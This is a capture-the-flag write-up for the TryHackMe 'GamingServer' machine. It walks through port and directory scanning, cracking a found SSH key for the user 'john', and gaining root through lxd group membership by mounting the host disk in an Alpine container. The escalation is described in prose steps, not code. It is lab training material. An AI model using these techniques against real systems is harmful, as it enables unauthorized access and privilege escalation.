GamingServer | TryHackMe
Let’s deploy the machine and run the Nmap for open ports.
nmap -sC -sV -Pn 10.10.75.194Nmap result
We can see 22,80 ports are open. Let’s run gobuster for directory enumeration and export the output.
gobuster dir -u http://10.10.75.194 -w /usr/share/dirb/wordlists/common.txt | tee gobuster.txtgobuster
Okay…., We got our gobuster result. But, before checking them, let’s check the HTTP site as a starting point.
Okay, looks like it’s a dynamic website with multiple contents added. Let’s check the source code to see if we can find anything.
Hoo, we got a comment where it highlighted to a person named “john”. Let’s keep a note of this name for future. Now let’s check the directories one by one.
We can see that there is an entry in the robots.txt file about a directory. I have navigated to that and saw there are 3 files. One of them is a dictionary file.
Let’s keep this aside for now and explore the curious “secret” directory.
The secret key in the Secret directory
Ohhh nice, we got a secret key. Let’s grab the key and use john to crack it.
We have the key and user name “john” from the robots file. Let’s grab the ssh to move forward.
So, finally got the SSH session. Let’s find out our initial key.
We need to elevate our privileges. I did try running sudo -l but no luck. I have checked the tags of this machine from THM and noticed a tag related to lxd.
LXD is a next generation system container manager. It offers a user experience similar to virtual machines but using Linux containers instead. It's image based with pre-made images available for a wide number of Linux distributions and is built around a very powerful, yet pretty simple, REST API.I tried some public exploits for LXD and found one for Ubuntu 18.04. This is made on Alpine distro where we need to build alpine and create a container that has a script to gain root access. Let’s follow step-by-step.
1.Firstly, we need to clone the required alphine git repo and build it on our machine(Attacker)
2.Once we build it, we will have a compressed image file in tar format.
3. We need to make a script which exploit the lxd group and send both of them to victim machine.
4. Change the permission of the script and run it.
5. Once you run the script, it will import the image and create the container with elevated access.
6. Since the image have the admin access and it will mount the whole victim machine's root disk and give complete access.
7. Now since we are root in this image with having access to our victim's machine's root directory, we can navigate it and get our final flagFinally, we got our second flag.
